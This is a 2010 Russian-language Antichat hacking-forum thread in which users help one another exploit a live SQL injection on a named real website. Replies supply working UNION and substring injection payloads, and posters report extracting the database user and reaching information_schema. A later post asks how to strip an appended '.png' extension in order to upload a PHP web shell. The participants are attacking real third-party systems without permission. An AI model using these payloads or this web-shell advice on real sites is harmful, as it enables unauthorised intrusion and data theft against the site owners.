Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

09.06.2010, 12:56
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме: 2212846
Репутация:
56
|
|
Сообщение от wildshaman
Случаи, когда в запрос подставляется ответ из другого не так уж и част 
Да, это не всегда может прокатить и в этом посте об этом упоминается. Дал как вариант 
|
|
|

09.06.2010, 13:31
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме: 195619
Репутация:
10
|
|
Непонятная иньекция
Добрый день, столкнулся с оч. странной иньекцией. Иньекция есть:
Код:
http://tenderjet.com/catalog/371-1
Плюсики она вроде как тоже кушает:
Код:
http://tenderjet.com/catalog/371+-+1
но вот даже and 1=1 кушать отказывается, ругаясь незнакомыми мне ошибками. и вообще ведет себя странно: например прокатывает такое
Код:
http://tenderjet.com/catalog/371-1+1=1
Честно говоря совсем не догоняю что тут происходит, толи иньекция в каком-то непопулярном месте sql запроса, толи там что-то фильтруется...
В общем, нужен взгляд человека со стороны
|
|
|

09.06.2010, 14:26
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме: 9220514
Репутация:
3338
|
|
Сообщение от Train
Добрый день, столкнулся с оч. странной иньекцией. Иньекция есть:
Код:
http://tenderjet.com/catalog/371-1+1=1
Честно говоря совсем не догоняю что тут происходит, толи иньекция в каком-то непопулярном месте sql запроса, толи там что-то фильтруется...
В общем, нужен взгляд человека со стороны
Код:
http://tenderjet.com/catalog/371&&substring(version(),1,1)=5
|
|
|

09.06.2010, 14:40
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме: 3217552
Репутация:
1668
|
|
2 Train
Код:
http://tenderjet.com/catalog/371&&(0)union(select(version()))
https://forum.antichat.ru/thread125796.html
__________________
Avant que l'ombre...
Последний раз редактировалось RulleR; 09.06.2010 в 14:50..
|
|
|

09.06.2010, 14:56
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме: 195619
Репутация:
10
|
|
Спасибо за помощь. Кстати я гляжу редкая иньекция - бд mysql доступна.
Последний раз редактировалось Train; 09.06.2010 в 14:59..
|
|
|

09.06.2010, 15:06
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
Провел на форуме: 264305
Репутация:
30
|
|
Pashkela
RulleR
а можно поподробнее что за &&
и что за (0) в запросе от RulleR ?
где об этом можно почитать ?
Кстати я гляжу редкая иньекция - бд mysql доступна.
http://tenderjet.com/catalog/371&&(0)union(select(user())from(mysql.user)) - ошибка
http://tenderjet.com/catalog/371&&(0)union(select(user())from(INFORMATION_SCHEM A.TABLES)) => tender@localhost
|
|
|

09.06.2010, 15:10
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме: 195619
Репутация:
10
|
|
Сообщение от DrakonHaSh
Pashkela
RulleR
а можно поподробнее что за &&
и что за (0) в запросе от RulleR ?
где об этом можно почитать ?
http://tenderjet.com/catalog/371&&(0)union(select(user())from(mysql.user)) - ошибка
http://tenderjet.com/catalog/371&&(0)union(select(user())from(INFORMATION_SCHEM A.TABLES)) => tender@localhost
Просто все дело было в плюсиках(пробелах) которые эта иньекция не переваривала а &&(0) это тоже самое что и and 0 чтобы первый запрос ничего не вывел.
INFORMATION_SCHEMA.schemata показывает базу mysql это я поторопился - показывает, но дейстивительно ничего не прочитаешь. Всеравно это к добру - налицо неправильная настройка сервера. файлы вроде тоже не читает, но ничего, прорвемся... как-нибудь
|
|
|

09.06.2010, 20:08
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме: 405538
Репутация:
23
|
|
Есть php-скрипт, которому передается два параметра и jpg-файл. Скрипт конвертит jpg в png и закидывает файл в /images/ с именем
image-%первый_параметр%-%второой_параметр%.png
Оба параметра практически не фильтруются(ни по длине, ни по содержанию). Есть способы обрезать конечное расширение ".png", дописываемое скриптом, чтобы залить пхпшный шелл?
%00 - безуспешно.
|
|
|

09.06.2010, 20:11
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме: 12942062
Репутация:
1550
|
|
Если скрипт КОНВЕРТИТ джипег, а не переименовывает - тогда бесполезно даже пытаться.
|
|
|

09.06.2010, 20:30
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме: 405538
Репутация:
23
|
|
Нет же, переименовывает. А то, что конвертит - это общий функционал.
Я же написал:
закидывает файл в /images/ с именем
image-%первый_параметр%-%второой_параметр%.png
Под параметрами я имел ввиду переменные, передающиеся POST'ом.
Последний раз редактировалось Nek1t; 09.06.2010 в 20:37..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|